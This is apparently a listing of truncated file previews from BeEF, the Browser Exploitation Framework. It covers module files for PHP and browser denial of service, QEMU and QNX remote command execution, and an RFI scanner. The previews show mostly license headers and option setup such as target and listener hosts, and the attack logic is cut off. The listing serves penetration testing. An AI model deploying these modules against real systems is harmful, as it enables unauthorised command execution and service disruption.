# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Php_dos < BeEF::Core::Command def self.options [ { 'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'val...
JavaScript
beef/modules/exploits/qemu_monitor_migrate_cmd_exec/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var lhost = '<%= @lhost %>'; var lport = '<...
YAML
beef/modules/exploits/qemu_monitor_migrate_cmd_exec/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: qemu_monitor_migrate_cmd_exec: enable: true category: "Exploits" name: "QEMU M...
Ruby
beef/modules/exploits/qemu_monitor_migrate_cmd_exec/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Qemu_monitor_migrate_cmd_exec < BeEF::Core::Command def self.options configuration = BeEF::Core::Configuration.instance lhos...
JavaScript
beef/modules/exploits/qnx_qconn_command_execution/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var timeout = '<%= @timeout %>'; // vali...
YAML
beef/modules/exploits/qnx_qconn_command_execution/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: qnx_qconn_command_execution: enable: true category: "Exploits" name: "QNX QCON...
Ruby
beef/modules/exploits/qnx_qconn_command_execution/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Qnx_qconn_command_execution < BeEF::Core::Command def self.options [ { 'name' => 'rhost', 'ui_label' => 'Remote Host', 'va...
JavaScript
beef/modules/exploits/resource_exhaustion_dos/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var resource_exhaustion_dos_<%= @command_id %> = beef.dom.createInvisibleIframe(); var url = beef.net.htt...
YAML
beef/modules/exploits/resource_exhaustion_dos/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: resource_exhaustion_dos: enable: true category: "Exploits" name: "Resource Exh...
Ruby
beef/modules/exploits/resource_exhaustion_dos/module.rb
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # class Resource_exhaustion_dos < BeEF::Core::Command def self.options [] end def pre_send src = %q{<iframe src="javascript:whi...
JavaScript
beef/modules/exploits/rfi_scanner/command.js
// // Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - http://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { var rproto = '<%= @rproto %>'; var rhost = '<%= @rhost %>'; var rport = '<%= @rport %>'; var base_d...
YAML
beef/modules/exploits/rfi_scanner/config.yaml
# # Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # beef: module: rfi_scanner: enable: true category: "Exploits" name: "RFI Scanner" ...